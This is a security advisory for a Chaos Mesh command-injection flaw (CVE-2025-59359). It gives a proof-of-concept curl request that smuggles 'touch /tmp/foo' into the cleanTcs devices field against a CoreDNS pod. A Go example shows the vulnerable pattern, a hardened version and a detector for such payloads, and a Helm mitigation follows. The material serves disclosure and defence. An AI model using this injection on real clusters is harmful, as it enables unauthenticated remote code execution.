
JFSA-2025-001449534 - Chaos Mesh cleanTcs command injection

CVE-2025-59359 | CVSS 9.8

JFrog Severity: critical

Discovered by Natan Nehorai of the JFrog Security Research Team

Published 15 Sep, 2025 | Last updated 15 Sep, 2025

OS command injection in Chaos Mesh via the cleanTcs mutation

github.com/chaos-mesh/chaos-mesh

Vulnerable versions: (,2.7.2] (every release up to and including 2.7.2)

The cleanTcs mutation served by the Chaos Controller Manager's GraphQL control server (the endpoint chaosctl talks to; port 10082 in the request below) builds an OS command from the caller-supplied devices argument without sanitizing it, so shell metacharacters in a "device name" are executed as additional commands. Combined with CVE-2025-59358, which makes that GraphQL server reachable without authentication, any in-cluster attacker who can reach the port can pick a target pod by namespace and name and execute arbitrary commands, giving remote code execution across the cluster. The request below targets a CoreDNS pod in kube-system and appends touch /tmp/foo to the intended tc command:

curl -X POST http://10.111.136.129:10082/query -H 'Content-Type: application/json' -d '{
    "query": "mutation MutatePod($namespace: String! = \"default\", $podName: String!, $devices: [String!]!) { pod(ns: $namespace, name: $podName) { pod { name namespace } cleanTcs(devices: $devices) } }",
    "variables": {
      "namespace": "kube-system",
      "podName": "coredns-5dd5756b68-779rm",
      "devices": ["eth0 root; touch /tmp/foo; "]
    }
  }'
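The injection above comes down to a single pattern: a string the client controls is spliced into a command line that a shell later parses. The following Go example is added here and is not code from Chaos Mesh or from JFrog; it shows a hypothetical handler in the vulnerable shape next to a hardened one that allow-lists the device name and passes it to tc as one argv element with no shell, plus a small helper that parses a captured /query request body and flags devices[] values that would fail validation. The function names, the interface-name regex and the embedded request body (copied from the advisory's curl command, no server is contacted) are assumptions for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os/exec"
	"regexp"
)

// Linux interface names are at most 15 bytes and never contain spaces,
// '/' or shell metacharacters. This allow-list is stricter than the kernel
// but accepts every device a pod is likely to have (eth0, lo, eth0.100).
// It is an assumption for this example, not Chaos Mesh's own rule.
var ifaceNameRe = regexp.MustCompile(`^[A-Za-z0-9._@-]{1,15}$`)

// VulnerableCleanTcLine reproduces the injection pattern in a hypothetical
// handler: the attacker-controlled device string is spliced into one command
// line that would later be handed to a shell. It only returns the line.
func VulnerableCleanTcLine(device string) string {
	return "tc qdisc del dev " + device + " root"
}

// ValidateDevice rejects anything that is not a plausible interface name.
func ValidateDevice(device string) error {
	if !ifaceNameRe.MatchString(device) {
		return fmt.Errorf("rejecting device name %q", device)
	}
	return nil
}

// SafeCleanTcArgs returns the argv for tc with the device as a single
// argument; nothing in it is ever parsed by a shell.
func SafeCleanTcArgs(device string) ([]string, error) {
	if err := ValidateDevice(device); err != nil {
		return nil, err
	}
	return []string{"tc", "qdisc", "del", "dev", device, "root"}, nil
}

// RunSafeCleanTc executes the validated argv through exec.Command, so a
// value such as "eth0 root; touch /tmp/foo; " is refused before anything
// runs, and even a valid name is never interpreted by a shell.
func RunSafeCleanTc(device string) error {
	argv, err := SafeCleanTcArgs(device)
	if err != nil {
		return err
	}
	return exec.Command(argv[0], argv[1:]...).Run()
}

// mutationRequest models the JSON body the advisory's curl command sends.
type mutationRequest struct {
	Query     string `json:"query"`
	Variables struct {
		Namespace string   `json:"namespace"`
		PodName   string   `json:"podName"`
		Devices   []string `json:"devices"`
	} `json:"variables"`
}

// SuspiciousDevices parses a request body for the /query endpoint and
// returns every devices[] value that fails ValidateDevice; a practical way
// to triage logged requests to port 10082 for exploitation attempts.
func SuspiciousDevices(body []byte) ([]string, error) {
	var req mutationRequest
	if err := json.Unmarshal(body, &req); err != nil {
		return nil, err
	}
	var bad []string
	for _, d := range req.Variables.Devices {
		if ValidateDevice(d) != nil {
			bad = append(bad, d)
		}
	}
	return bad, nil
}

// ConstructedPayload is the advisory's request body embedded as sample
// input (constructed for this example; nothing is sent anywhere).
const ConstructedPayload = `{
  "query": "mutation MutatePod($namespace: String! = \"default\", $podName: String!, $devices: [String!]!) { pod(ns: $namespace, name: $podName) { pod { name namespace } cleanTcs(devices: $devices) } }",
  "variables": {"namespace": "kube-system", "podName": "coredns-5dd5756b68-779rm", "devices": ["eth0 root; touch /tmp/foo; "]}
}`

func main() {
	bad, err := SuspiciousDevices([]byte(ConstructedPayload))
	if err != nil {
		panic(err)
	}
	for _, d := range bad {
		fmt.Printf("a shell would run: %q\n", VulnerableCleanTcLine(d))
		fmt.Printf("hardened handler:  %v\n", ValidateDevice(d))
	}
	argv, _ := SafeCleanTcArgs("eth0")
	fmt.Println("argv for a valid device:", argv)
}
```

The hardened path relies on two independent controls: the allow-list stops the payload at the API boundary, and exec.Command with a separate argv means that even a name which slipped past validation would reach tc as a literal argument rather than a shell command line.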

If upgrading Chaos Mesh to the fixed version is not possible, re-deploy the Helm chart with the control server disabled (enableCtrlServer=false). This turns off the GraphQL endpoint that chaosctl uses, the one listening on port 10082 in the request above, and removes the exposed surface for both this issue and CVE-2025-59358; chaosctl will no longer work against that deployment:

helm install chaos-mesh chaos-mesh/chaos-mesh -n=chaos-mesh --version 2.7.x --set enableCtrlServer=false

Fix PR

JFrog Technical Blog
